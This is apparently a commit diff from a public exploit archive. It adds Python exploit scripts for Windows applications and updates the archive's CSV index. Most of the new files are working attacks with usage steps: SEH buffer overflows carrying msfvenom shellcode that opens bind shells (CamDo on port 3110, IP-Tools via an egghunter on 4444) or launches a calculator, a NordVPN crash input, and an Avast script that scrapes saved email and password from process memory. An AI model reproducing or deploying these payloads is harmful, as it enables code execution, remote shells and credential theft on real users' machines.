# Proof of Concept:
# 1.- Run the python script, it will create a new file "PoC.txt"
# 2.- Copy the text from the generated PoC.txt file to clipboard
# 3.- Open NordVPN.exe
# 3.- Paste clipboard in 'E-mail' field
# 4.- Write '1234' in 'Password' field
# 5.- Clic on button -> Sign In
# 6.- Crashed
buffer = "\x41" * 100000
f = open ("PoC.txt", "w")
f.write(buffer)
f.close()

44
exploits/windows/dos/46346.py Executable file
View file

@ -0,0 +1,44 @@
# Exploit Title: River Past Video Cleaner Buffer Overflow (SEH)
# Date: 9-2-2019
# Exploit Author: crash_manucoot
# Contact: twitter.com/crash_manucoot
# Software Link: https://river-past-video-cleaner.softonic.com/
# Version: 7.6.3
# Tested on: Windows 10 Pro x64 SPANISH
# Category: Windows Local Exploit
# How to use:open the program go to file-options paste the contents of open.txt in the Lame_enc.dll field and the calculator will open
buff = "A" * 280
nseh = "\xeb\x06\x90\x90"
seh = "\x3a\x91\x01\x10"
nop = "\x90" * 16
shellcode = ""
shellcode += "\xbf\xc6\xde\x94\x3e\xda\xd0\xd9\x74\x24\xf4\x5d"
shellcode += "\x31\xc9\xb1\x31\x31\x7d\x13\x03\x7d\x13\x83\xc5"
shellcode += "\xc2\x3c\x61\xc2\x22\x42\x8a\x3b\xb2\x23\x02\xde"
shellcode += "\x83\x63\x70\xaa\xb3\x53\xf2\xfe\x3f\x1f\x56\xeb"
shellcode += "\xb4\x6d\x7f\x1c\x7d\xdb\x59\x13\x7e\x70\x99\x32"
shellcode += "\xfc\x8b\xce\x94\x3d\x44\x03\xd4\x7a\xb9\xee\x84"
shellcode += "\xd3\xb5\x5d\x39\x50\x83\x5d\xb2\x2a\x05\xe6\x27"
shellcode += "\xfa\x24\xc7\xf9\x71\x7f\xc7\xf8\x56\x0b\x4e\xe3"
shellcode += "\xbb\x36\x18\x98\x0f\xcc\x9b\x48\x5e\x2d\x37\xb5"
shellcode += "\x6f\xdc\x49\xf1\x57\x3f\x3c\x0b\xa4\xc2\x47\xc8"
shellcode += "\xd7\x18\xcd\xcb\x7f\xea\x75\x30\x7e\x3f\xe3\xb3"
shellcode += "\x8c\xf4\x67\x9b\x90\x0b\xab\x97\xac\x80\x4a\x78"
shellcode += "\x25\xd2\x68\x5c\x6e\x80\x11\xc5\xca\x67\x2d\x15"
shellcode += "\xb5\xd8\x8b\x5d\x5b\x0c\xa6\x3f\x31\xd3\x34\x3a"
shellcode += "\x77\xd3\x46\x45\x27\xbc\x77\xce\xa8\xbb\x87\x05"
shellcode += "\x8d\x34\xc2\x04\xa7\xdc\x8b\xdc\xfa\x80\x2b\x0b"
shellcode += "\x38\xbd\xaf\xbe\xc0\x3a\xaf\xca\xc5\x07\x77\x26"
shellcode += "\xb7\x18\x12\x48\x64\x18\x37\x2b\xeb\x8a\xdb\x82"
shellcode += "\x8e\x2a\x79\xdb"
evil = buff + nseh + seh + nop + shellcode
file = open('open.txt','w+')
file.write(evil)
file.close()

119
exploits/windows/local/46334.py Executable file
View file

@ -0,0 +1,119 @@
#!/usr/bin/env python
#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: IP-Tools 2.5 - Local Buffer Overflow(EggHunter) #
# Date: 2019-02-06 #
# Author: Juan Prescotto #
# Tested Against: Win7 Pro SP1 64 bit #
# Software Download #1: https://web.archive.org/web/20070322163021/http://hostmonitor.biz:80/download/ip-tools.exe #
# Software Download #2: https://www.exploit-db.com/apps/4a83348f18a18ba34f9747648b550307-ip-tools.exe #
# Version: 2.5 #
# Special Thanks to my wife for allowing me spend countless hours on this passion of mine #
# Steps : Open the APP > SNMP Scanner > paste in contents from the egg.txt into "From Addr" > "Start" > Click "Options" > #
# "Host Monitor" --> "Logging" > paste in contents from the egghunter.txt into "Log to file" > OK > Bind Shell - Port 4444 #
#------------------------------------------------------------------------------------------------------------------------------------#
# Good Characers: alphanumeric and printable special characters #
# EIP Offset Overwrite ("Log to file" field): 264 #
# Non-Participating Modules: ip_tools.exe #
#------------------------------------------------------------------------------------------------------------------------------------#
# "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite --> #
# Stack Adjust (0x40) / RETN --> Egghunter Shellcode --> Egg Shellcode #
#------------------------------------------------------------------------------------------------------------------------------------#
##################EGG Shellcode Generation#################################
#msfvenom -p windows/shell_bind_tcp LPORT=4444 BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg
#710 bytes + 8 bytes for egg identifier
egg = "w00tw00t"
egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
egg += "\x69\x6c\x4b\x58\x6d\x52\x35\x50\x35\x50\x75\x50\x63"
egg += "\x50\x4f\x79\x4d\x35\x36\x51\x4b\x70\x71\x74\x6e\x6b"
egg += "\x36\x30\x46\x50\x6e\x6b\x66\x32\x44\x4c\x6c\x4b\x63"
egg += "\x62\x54\x54\x4c\x4b\x72\x52\x65\x78\x34\x4f\x68\x37"
egg += "\x52\x6a\x34\x66\x50\x31\x59\x6f\x4c\x6c\x57\x4c\x53"
egg += "\x51\x71\x6c\x67\x72\x54\x6c\x31\x30\x5a\x61\x58\x4f"
egg += "\x34\x4d\x56\x61\x4f\x37\x68\x62\x4a\x52\x36\x32\x66"
egg += "\x37\x4e\x6b\x36\x32\x42\x30\x6c\x4b\x50\x4a\x35\x6c"
egg += "\x4c\x4b\x72\x6c\x44\x51\x44\x38\x78\x63\x32\x68\x55"
egg += "\x51\x78\x51\x43\x61\x6e\x6b\x76\x39\x45\x70\x75\x51"
egg += "\x59\x43\x6e\x6b\x33\x79\x42\x38\x4d\x33\x65\x6a\x71"
egg += "\x59\x6e\x6b\x36\x54\x4e\x6b\x36\x61\x78\x56\x46\x51"
egg += "\x49\x6f\x4e\x4c\x79\x51\x7a\x6f\x66\x6d\x35\x51\x48"
egg += "\x47\x36\x58\x79\x70\x30\x75\x39\x66\x33\x33\x33\x4d"
egg += "\x58\x78\x57\x4b\x73\x4d\x56\x44\x53\x45\x48\x64\x61"
egg += "\x48\x4e\x6b\x72\x78\x67\x54\x57\x71\x69\x43\x73\x56"
egg += "\x6e\x6b\x54\x4c\x50\x4b\x6c\x4b\x53\x68\x37\x6c\x73"
egg += "\x31\x58\x53\x4c\x4b\x74\x44\x4e\x6b\x67\x71\x48\x50"
egg += "\x4f\x79\x70\x44\x36\x44\x76\x44\x51\x4b\x71\x4b\x55"
egg += "\x31\x46\x39\x32\x7a\x63\x61\x4b\x4f\x6b\x50\x53\x6f"
egg += "\x61\x4f\x61\x4a\x4c\x4b\x62\x32\x6a\x4b\x6e\x6d\x31"
egg += "\x4d\x63\x58\x75\x63\x54\x72\x35\x50\x45\x50\x33\x58"
egg += "\x52\x57\x33\x43\x36\x52\x73\x6f\x62\x74\x33\x58\x30"
egg += "\x4c\x31\x67\x54\x66\x63\x37\x69\x6f\x6e\x35\x78\x38"
egg += "\x4e\x70\x63\x31\x37\x70\x43\x30\x35\x79\x4f\x34\x32"
egg += "\x74\x46\x30\x51\x78\x36\x49\x4f\x70\x52\x4b\x63\x30"
egg += "\x59\x6f\x38\x55\x73\x5a\x43\x38\x70\x59\x36\x30\x49"
egg += "\x72\x59\x6d\x57\x30\x52\x70\x47\x30\x50\x50\x51\x78"
egg += "\x5a\x4a\x44\x4f\x6b\x6f\x79\x70\x39\x6f\x39\x45\x4f"
egg += "\x67\x65\x38\x44\x42\x77\x70\x64\x51\x71\x4c\x6c\x49"
egg += "\x6d\x36\x32\x4a\x72\x30\x63\x66\x56\x37\x30\x68\x68"
egg += "\x42\x4b\x6b\x64\x77\x61\x77\x59\x6f\x39\x45\x70\x57"
egg += "\x35\x38\x6d\x67\x68\x69\x65\x68\x59\x6f\x6b\x4f\x4a"
egg += "\x75\x36\x37\x75\x38\x34\x34\x58\x6c\x57\x4b\x4d\x31"
egg += "\x49\x6f\x4a\x75\x51\x47\x4e\x77\x55\x38\x32\x55\x52"
egg += "\x4e\x70\x4d\x43\x51\x39\x6f\x6e\x35\x51\x78\x70\x63"
egg += "\x32\x4d\x33\x54\x77\x70\x6e\x69\x68\x63\x30\x57\x63"
egg += "\x67\x30\x57\x55\x61\x6b\x46\x71\x7a\x56\x72\x31\x49"
egg += "\x62\x76\x6d\x32\x79\x6d\x55\x36\x6a\x67\x62\x64\x51"
egg += "\x34\x67\x4c\x73\x31\x33\x31\x6e\x6d\x71\x54\x44\x64"
egg += "\x66\x70\x39\x56\x43\x30\x77\x34\x43\x64\x76\x30\x72"
egg += "\x76\x61\x46\x50\x56\x32\x66\x30\x56\x62\x6e\x72\x76"
egg += "\x53\x66\x61\x43\x52\x76\x62\x48\x44\x39\x78\x4c\x45"
egg += "\x6f\x4f\x76\x69\x6f\x68\x55\x6b\x39\x39\x70\x42\x6e"
egg += "\x66\x36\x50\x46\x69\x6f\x36\x50\x75\x38\x33\x38\x4b"
egg += "\x37\x67\x6d\x73\x50\x69\x6f\x6a\x75\x6d\x6b\x58\x70"
egg += "\x4d\x65\x79\x32\x76\x36\x75\x38\x4e\x46\x6f\x65\x6d"
egg += "\x6d\x6f\x6d\x69\x6f\x79\x45\x35\x6c\x73\x36\x31\x6c"
egg += "\x44\x4a\x6b\x30\x79\x6b\x4d\x30\x73\x45\x74\x45\x6f"
egg += "\x4b\x30\x47\x32\x33\x31\x62\x72\x4f\x52\x4a\x37\x70"
egg += "\x72\x73\x49\x6f\x7a\x75\x41\x41"
f = open ("egg.txt", "w")
f.write(egg)
f.close()
##################EGG Hunter Shellcode Generation#################################
#encode egghunter code (looking for w00tw00t) (wow64 egghunter code produced by mona) into only alpha characters; egghunter shellcode proceeded by xor edx,edx (start egg hunting at 0x00000000)
#echo -ne "\x33\xd2\x31\xdb\x53\x53\x53\x53\xb3\xc0\x66\x81\xca\xff\x0f\x42\x52\x6a\x26\x58\x33\xc9\x8b\xd4\x64\xff\x13\x5e\x5a\x3c\x05\x74\xe9\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xe4\xaf\x75\xe1\xff\xe7" | msfvenom BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egghunter -p -
#150 bytes
egghunter = ""
egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
egghunter += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
egghunter += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
egghunter += "\x42\x75\x4a\x49\x35\x63\x4b\x62\x30\x31\x4b\x6b"
egghunter += "\x52\x73\x56\x33\x46\x33\x46\x33\x58\x33\x49\x50"
egghunter += "\x45\x36\x6f\x71\x6a\x6a\x6b\x4f\x46\x6f\x31\x52"
egghunter += "\x66\x32\x72\x4a\x55\x76\x32\x78\x70\x33\x38\x49"
egghunter += "\x6e\x6b\x5a\x74\x55\x34\x79\x6f\x37\x63\x53\x6e"
egghunter += "\x62\x7a\x55\x6c\x66\x65\x51\x64\x4d\x39\x48\x38"
egghunter += "\x30\x77\x50\x30\x70\x30\x74\x34\x4e\x6b\x58\x7a"
egghunter += "\x6c\x6f\x51\x65\x4a\x44\x4e\x4f\x42\x55\x79\x71"
egghunter += "\x69\x6f\x6a\x47\x41\x41"
#0x00473259 : {pivot 64 / 0x40}[IP_TOOLS.EXE]
eip = "\x59\x32\x47\x00"
buffer = egghunter + "\x41" * (264 - len(egghunter)) + eip
f = open ("egghunter.txt", "w")
f.write(buffer)
f.close()

67
exploits/windows/local/46335.py Executable file
View file

@ -0,0 +1,67 @@
# Exploit Title: River Past CamDo SEH Local Exploit
# Date: 07.02.2019
# Vendor Homepage:www.riverpast.com
# Software Link: https://en.softonic.com/download/river-past-cam-do/windows/post-download?sl=1
# Exploit Author: Achilles
# Tested Version: 3.7.6
# Tested on: Windows XP SP3 EN
# 1.- Run python code : CamDo.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open CamDo.exe and click on the 'Options' Inside fhe 'File' Menu.
# 4.- Paste the Content of EVIL.txt into the 'Lame_enc.dll' name field.
# 5.- Click 'OK' and you will have a bind shell port 3110.
#!/usr/bin/env python
import struct
buffer = "\x41" * 280
NSEH = "\xeb\x06\x90\x90" #jmp short 6
SEH = struct.pack('<L',0x10010b0b) #pop pop ret rvddshow2.dll
nops = "\x90" * 20
#badchar \x00\x0a\x0d\x2f\
#msfvenom -p windows/shell_bind_tcp LPORT=3110 -a x86 -b '\x00\x0a\x0d\x2f' -f python
shellcode = ("\xb8\x9c\x94\x39\x34\xdb\xda\xd9\x74\x24\xf4\x5a\x33"
"\xc9\xb1\x53\x31\x42\x12\x03\x42\x12\x83\x5e\x90\xdb"
"\xc1\xa2\x71\x99\x2a\x5a\x82\xfe\xa3\xbf\xb3\x3e\xd7"
"\xb4\xe4\x8e\x93\x98\x08\x64\xf1\x08\x9a\x08\xde\x3f"
"\x2b\xa6\x38\x0e\xac\x9b\x79\x11\x2e\xe6\xad\xf1\x0f"
"\x29\xa0\xf0\x48\x54\x49\xa0\x01\x12\xfc\x54\x25\x6e"
"\x3d\xdf\x75\x7e\x45\x3c\xcd\x81\x64\x93\x45\xd8\xa6"
"\x12\x89\x50\xef\x0c\xce\x5d\xb9\xa7\x24\x29\x38\x61"
"\x75\xd2\x97\x4c\xb9\x21\xe9\x89\x7e\xda\x9c\xe3\x7c"
"\x67\xa7\x30\xfe\xb3\x22\xa2\x58\x37\x94\x0e\x58\x94"
"\x43\xc5\x56\x51\x07\x81\x7a\x64\xc4\xba\x87\xed\xeb"
"\x6c\x0e\xb5\xcf\xa8\x4a\x6d\x71\xe9\x36\xc0\x8e\xe9"
"\x98\xbd\x2a\x62\x34\xa9\x46\x29\x51\x1e\x6b\xd1\xa1"
"\x08\xfc\xa2\x93\x97\x56\x2c\x98\x50\x71\xab\xdf\x4a"
"\xc5\x23\x1e\x75\x36\x6a\xe5\x21\x66\x04\xcc\x49\xed"
"\xd4\xf1\x9f\x98\xdc\x54\x70\xbf\x21\x26\x20\x7f\x89"
"\xcf\x2a\x70\xf6\xf0\x54\x5a\x9f\x99\xa8\x65\x93\x7f"
"\x24\x83\xc1\x6f\x60\x1b\x7d\x52\x57\x94\x1a\xad\xbd"
"\x8c\x8c\xe6\xd7\x0b\xb3\xf6\xfd\x3b\x23\x7d\x12\xf8"
"\x52\x82\x3f\xa8\x03\x15\xb5\x39\x66\x87\xca\x13\x10"
"\x24\x58\xf8\xe0\x23\x41\x57\xb7\x64\xb7\xae\x5d\x99"
"\xee\x18\x43\x60\x76\x62\xc7\xbf\x4b\x6d\xc6\x32\xf7"
"\x49\xd8\x8a\xf8\xd5\x8c\x42\xaf\x83\x7a\x25\x19\x62"
"\xd4\xff\xf6\x2c\xb0\x86\x34\xef\xc6\x86\x10\x99\x26"
"\x36\xcd\xdc\x59\xf7\x99\xe8\x22\xe5\x39\x16\xf9\xad"
"\x4a\x5d\xa3\x84\xc2\x38\x36\x95\x8e\xba\xed\xda\xb6"
"\x38\x07\xa3\x4c\x20\x62\xa6\x09\xe6\x9f\xda\x02\x83"
"\x9f\x49\x22\x86")
payload = buffer + NSEH + SEH + nops + shellcode
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

49
exploits/windows/local/46345.py Executable file
View file

@ -0,0 +1,49 @@
# Exploit Title: Avast Anti-Virus Local Credentials Disclosure < 19.1.2360
# Date: 01/18/2019
# Exploit Author: Nathu Nandwani
# Website: http://nandtech.co/
# Version: before 19.1.2360 (build 19.1.4142.0)
# Tested on: Windows 10 x64
# CVE: CVE-2018-12572
# Based on LiquidWorm's and Yakir Wizman's proof of concepts
from winappdbg import Debug, Process
debug = Debug()
processname = "AvastUI.exe"
pid = 0
mem_contents = []
email = ""
password = ""
try:
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(processname):
pid = process.get_pid()
if pid is not 0:
print ("AvastUI PID: " + str(pid))
process = Process(pid)
for i in process.search_regexp('"password":"'):
mem_contents.append(process.read(i[0], 200))
print "Dump: "
print process.read(i[0], 200)
for i in mem_contents:
password = i.split(",")[0]
for i in process.search_regexp('"email":"'):
mem_contents.append(process.read(i[0], 200))
print "Dump: "
print process.read(i[0], 200)
for i in mem_contents:
email = i.split(",")[0]
if email != "" and password != "":
print ""
print "Found Credentials from Memory!"
print email
print password
else:
print "No credentials found!"
else:
print "Avast not running!"
finally:
debug.stop()

40
files_exploits.csv
View file

@ -2038,7 +2038,7 @@ id,file,description,date,author,type,platform,port
17842,exploits/windows/dos/17842.txt,"progea movicon / powerhmi 11.2.1085 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",dos,windows,
17843,exploits/windows/dos/17843.txt,"Rockwell RSLogix 19 - Denial of Service",2011-09-14,"Luigi Auriemma",dos,windows,
17844,exploits/windows/dos/17844.txt,"Measuresoft ScadaPro 4.0.0 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",dos,windows,
17856,exploits/windows/dos/17856.py,"KnFTP 1.0.0 Server - Multiple Buffer Overflows (Denial of Service) (SEH) (PoC)",2011-09-18,loneferret,dos,windows,21
17856,exploits/windows/dos/17856.py,"KnFTP 1.0.0 Server - Multiple Buffer Overflows (PoC) (SEH)",2011-09-18,loneferret,dos,windows,21
17878,exploits/windows/dos/17878.txt,"EViews 7.0.0.1 (aka 7.2) - Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",dos,windows,
17879,exploits/windows/dos/17879.txt,"MetaServer RT 3.2.1.450 - Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",dos,windows,
17885,exploits/windows/dos/17885.txt,"sunway ForceControl 6.1 sp3 - Multiple Vulnerabilities",2011-09-23,"Luigi Auriemma",dos,windows,
@ -4151,7 +4151,7 @@ id,file,description,date,author,type,platform,port
32860,exploits/java/dos/32860.txt,"Sun Java System Calendar Server 6.3 - Duplicate URI Request Denial of Service",2009-03-31,"SCS team",dos,java,
32865,exploits/multiple/dos/32865.py,"WhatsApp < 2.11.7 - Remote Crash",2014-04-14,"Jaime Sánchez",dos,multiple,
32881,exploits/windows/dos/32881.py,"QtWeb Browser 2.0 - '.HTML' File Remote Denial of Service",2009-04-01,LiquidWorm,dos,windows,
32899,exploits/windows/dos/32899.py,"Jzip - Buffer Overflow (Denial of Service) (SEH Unicode)",2014-04-16,"motaz reda",dos,windows,
32899,exploits/windows/dos/32899.py,"Jzip - Buffer Overflow (PoC) (SEH Unicode)",2014-04-16,"motaz reda",dos,windows,
32902,exploits/windows/dos/32902.py,"Microsoft Internet Explorer 8 - File Download Denial of Service",2009-04-11,"Nam Nguyen",dos,windows,
32926,exploits/linux/dos/32926.c,"Linux Kernel - 'group_info' refcounter Overflow Memory Corruption",2014-04-18,"Thomas Pollet",dos,linux,
32939,exploits/windows/dos/32939.txt,"Trend Micro OfficeScan 8.0 Client - Denial of Service",2009-04-21,"Juan Pablo Lopez Yacubian",dos,windows,
@ -4442,8 +4442,8 @@ id,file,description,date,author,type,platform,port
35489,exploits/multiple/dos/35489.pl,"Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Remote Denial of Service",2011-03-23,"Vladimir Perepelitsa",dos,multiple,
35502,exploits/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 - Denial of Service",2011-03-27,KedAns-Dz,dos,windows,
35507,exploits/windows/dos/35507.pl,"DivX Player 7 - Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,dos,windows,
35530,exploits/windows/dos/35530.py,"Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (Denial of Service) (SEH) (PoC)",2014-12-15,s-dz,dos,windows,
35531,exploits/windows/dos/35531.py,"Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (Denial of Service) (SEH) (PoC)",2014-12-15,s-dz,dos,windows,
35530,exploits/windows/dos/35530.py,"Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (PoC) (SEH Overwrite)",2014-12-15,s-dz,dos,windows,
35531,exploits/windows/dos/35531.py,"Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (PoC) (SEH Overwrite)",2014-12-15,s-dz,dos,windows,
35532,exploits/windows/dos/35532.py,"jaangle 0.98i.977 - Denial of Service",2014-12-15,s-dz,dos,windows,
35539,exploits/php/dos/35539.txt,"phpMyAdmin 4.0.x/4.1.x/4.2.x - Denial of Service",2014-12-15,"Javer Nieto & Andres Rojas",dos,php,
35552,exploits/windows/dos/35552.py,"MoviePlay 4.82 - '.avi' Buffer Overflow",2011-03-31,^Xecuti0N3r,dos,windows,
@ -5025,7 +5025,7 @@ id,file,description,date,author,type,platform,port
39466,exploits/multiple/dos/39466.txt,"Adobe Flash - H264 File Stack Corruption",2016-02-17,"Google Security Research",dos,multiple,
39467,exploits/multiple/dos/39467.txt,"Adobe Flash - BitmapData.drawWithQuality Heap Overflow",2016-02-17,"Google Security Research",dos,multiple,
39470,exploits/windows/dos/39470.py,"XM Easy Personal FTP Server 5.8.0 - 'HELP' Remote Denial of Service",2016-02-19,"Pawan Lal",dos,windows,
39471,exploits/windows/dos/39471.txt,"STIMS Buffer 1.1.20 - Buffer Overflow (Denial of Service) (SEH) (PoC)",2016-02-19,"Shantanu Khandelwal",dos,windows,
39471,exploits/windows/dos/39471.txt,"STIMS Buffer 1.1.20 - Buffer Overflow (PoC) (SEH Overwrite)",2016-02-19,"Shantanu Khandelwal",dos,windows,
39472,exploits/windows/dos/39472.txt,"STIMS Cutter 1.1.3.20 - Buffer Overflow (Denial of Service) (PoC)",2016-02-19,"Shantanu Khandelwal",dos,windows,
39475,exploits/windows/dos/39475.py,"QuickHeal 16.00 - 'webssx.sys' Driver Denial of Service",2016-02-19,"Fitzl Csaba",dos,windows,
39476,exploits/multiple/dos/39476.txt,"Adobe Flash - SimpleButton Creation Type Confusion",2016-02-19,"Google Security Research",dos,multiple,
@ -5064,7 +5064,7 @@ id,file,description,date,author,type,platform,port
39551,exploits/multiple/dos/39551.txt,"Putty pscp 0.66 - Stack Buffer Overwrite",2016-03-10,tintinweb,dos,multiple,
39555,exploits/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'snd-usb-audio' Crash (PoC)",2016-03-14,"OpenSource Security",dos,linux,
39556,exploits/linux/dos/39556.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'iowarrior' Driver Crash (PoC)",2016-03-14,"OpenSource Security",dos,linux,
39557,exploits/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - Overflow (SEH) (Denial of Service)",2016-03-14,INSECT.B,dos,windows,
39557,exploits/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - Overflow (PoC) (SEH)",2016-03-14,INSECT.B,dos,windows,
39560,exploits/windows/dos/39560.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",dos,windows,
39561,exploits/windows/dos/39561.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",dos,windows,
39562,exploits/windows/dos/39562.html,"Microsoft Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",dos,windows,
@ -6228,6 +6228,7 @@ id,file,description,date,author,type,platform,port
46030,exploits/windows/dos/46030.py,"SQLScan 1.0 - Denial of Service (PoC)",2018-12-21,"Rafael Pedrero",dos,windows,
46038,exploits/linux/dos/46038.py,"Angry IP Scanner for Linux 3.5.3 - Denial of Service (PoC)",2018-12-24,Sam,dos,linux,
46042,exploits/multiple/dos/46042.html,"Google Chrome 70 - SQLite Magellan Crash (PoC)",2018-12-15,zhuowei,dos,multiple,
46048,exploits/multiple/dos/46048.py,"Netatalk 3.1.12 - Authentication Bypass (PoC)",2018-12-21,"Tenable NS",dos,multiple,
46057,exploits/windows_x86/dos/46057.py,"Product Key Explorer 4.0.9 - Denial of Service (PoC)",2018-12-27,T3jv1l,dos,windows_x86,
46062,exploits/windows_x86/dos/46062.py,"NetShareWatcher 1.5.8 - Denial of Service (PoC)",2018-12-27,T3jv1l,dos,windows_x86,
46063,exploits/windows_x86/dos/46063.py,"ShareAlarmPro 2.1.4 - Denial of Service (PoC)",2018-12-27,T3jv1l,dos,windows_x86,
@ -6278,20 +6279,20 @@ id,file,description,date,author,type,platform,port
46278,exploits/linux/dos/46278.py,"MiniUPnPd 2.1 - Out-of-Bounds Read",2019-01-29,b1ack0wl,dos,linux,
46284,exploits/windows/dos/46284.py,"Advanced File Manager 3.4.1 - Denial of Service (PoC)",2019-01-30,"Rafael Pedrero",dos,windows,
46285,exploits/multiple/dos/46285.c,"iOS/macOS 10.13.6 - 'if_ports_used_update_wakeuuid()' 16-byte Uninitialized Kernel Stack Disclosure",2019-01-30,"Google Security Research",dos,multiple,
46286,exploits/windows/dos/46286.py,"IP-Tools 2.50 - Denial of Service SEH Overwrite (PoC)",2019-01-30,"Rafael Pedrero",dos,windows,
46287,exploits/windows/dos/46287.py,"Necrosoft DIG 0.4 - Denial of Service SEH Overwrite (PoC)",2019-01-30,"Rafael Pedrero",dos,windows,
46286,exploits/windows/dos/46286.py,"IP-Tools 2.50 - Local Buffer Overflow (PoC)",2019-01-30,"Rafael Pedrero",dos,windows,
46287,exploits/windows/dos/46287.py,"Necrosoft DIG 0.4 - Buffer Overflow (PoC) (SEH Overwrite)",2019-01-30,"Rafael Pedrero",dos,windows,
46289,exploits/windows/dos/46289.py,"Anyburn 4.3 - 'Convert image to file format' Denial of Service",2019-01-31,"Dino Covotsos",dos,windows,
46291,exploits/windows/dos/46291.py,"Advanced Host Monitor 11.90 Beta - 'Registration number' Denial of Service (PoC)",2019-01-31,"Luis Martínez",dos,windows,
46292,exploits/windows/dos/46292.py,"AMAC Address Change 5.4 - Denial of Service (PoC)",2019-01-31,"Rafael Pedrero",dos,windows,
46293,exploits/windows/dos/46293.py,"ASPRunner Professional 6.0.766 - Denial of Service (PoC)",2019-01-31,"Rafael Pedrero",dos,windows,
46294,exploits/windows/dos/46294.py,"FlexHEX 2.46 - Denial of Service SEH Overwrite (PoC)",2019-01-31,"Rafael Pedrero",dos,windows,
46294,exploits/windows/dos/46294.py,"FlexHEX 2.46 - Buffer Overflow (PoC) (SEH Overwrite)",2019-01-31,"Rafael Pedrero",dos,windows,
46295,exploits/windows/dos/46295.py,"LanHelper 1.74 - Denial of Service (PoC)",2019-01-31,"Rafael Pedrero",dos,windows,
46296,exploits/macos/dos/46296.c,"macOS XNU - Copy-on-Write Behaviour Bypass via Partial-Page Truncation of File",2019-01-31,"Google Security Research",dos,macos,
46297,exploits/multiple/dos/46297.c,"macOS < 10.14.3 / iOS < 12.1.3 - Arbitrary mach Port Name Deallocation in XPC Services due to Invalid mach Message Parsing in _xpc_serializer_unpack",2019-01-31,"Google Security Research",dos,multiple,
46298,exploits/multiple/dos/46298.c,"macOS < 10.14.3 / iOS < 12.1.3 - Sandbox Escapes due to Type Confusions and Memory Safety Issues in iohideventsystem",2019-01-31,"Google Security Research",dos,multiple,
46299,exploits/multiple/dos/46299.c,"macOS < 10.14.3 / iOS < 12.1.3 XNU - 'vm_map_copy' Optimization which Requires Atomicity isn't Atomic",2019-01-31,"Google Security Research",dos,multiple,
46300,exploits/multiple/dos/46300.c,"macOS < 10.14.3 / iOS < 12.1.3 - Kernel Heap Overflow in PF_KEY due to Lack of Bounds Checking when Retrieving Statistics",2019-01-31,"Google Security Research",dos,multiple,
46304,exploits/windows/dos/46304.py,"Remote Process Explorer 1.0.0.16 - Denial of Service SEH Overwrite (PoC)",2019-02-01,"Rafael Pedrero",dos,windows,
46304,exploits/windows/dos/46304.py,"Remote Process Explorer 1.0.0.16 - Buffer Overflow (PoC) (SEH Overwrite)",2019-02-01,"Rafael Pedrero",dos,windows,
46309,exploits/windows/dos/46309.py,"MyVideoConverter Pro 3.14 - Denial of Service",2019-02-04,Achilles,dos,windows,
46312,exploits/windows/dos/46312.py,"River Past Ringtone Converter 2.7.6.1601 - Denial of Service (PoC)",2019-02-04,"Rafael Pedrero",dos,windows,
46313,exploits/windows/dos/46313.py,"SpotAuditor 3.6.7 - Denial of Service (PoC)",2019-02-04,"Rafael Pedrero",dos,windows,
@ -6299,6 +6300,10 @@ id,file,description,date,author,type,platform,port
46321,exploits/windows/dos/46321.py,"Device Monitoring Studio 8.10.00.8925 - Denial of Service (PoC)",2019-02-05,"Victor Mondragón",dos,windows,
46322,exploits/windows/dos/46322.py,"River Past Audio Converter 7.7.16 - Denial of Service (PoC)",2019-02-05,Achilles,dos,windows,
46332,exploits/multiple/dos/46332.txt,"Skia - Incorrect Convexity Assumptions Leading to Buffer Overflows",2019-02-06,"Google Security Research",dos,multiple,
46337,exploits/android/dos/46337.sh,"AirDroid 4.2.1.6 - Denial of Service",2019-02-11,s4vitar,dos,android,
46338,exploits/windows/dos/46338.py,"FutureDj Pro 1.7.2.0 - Denial of Service",2019-02-11,Achilles,dos,windows,
46343,exploits/windows/dos/46343.py,"NordVPN 6.19.6 - Denial of Service (PoC)",2019-02-11,"Alejandra Sánchez",dos,windows,
46346,exploits/windows/dos/46346.py,"River Past Video Cleaner 7.6.3 - Local Buffer Overflow (SEH)",2019-02-11,crash_manucoot,dos,windows,
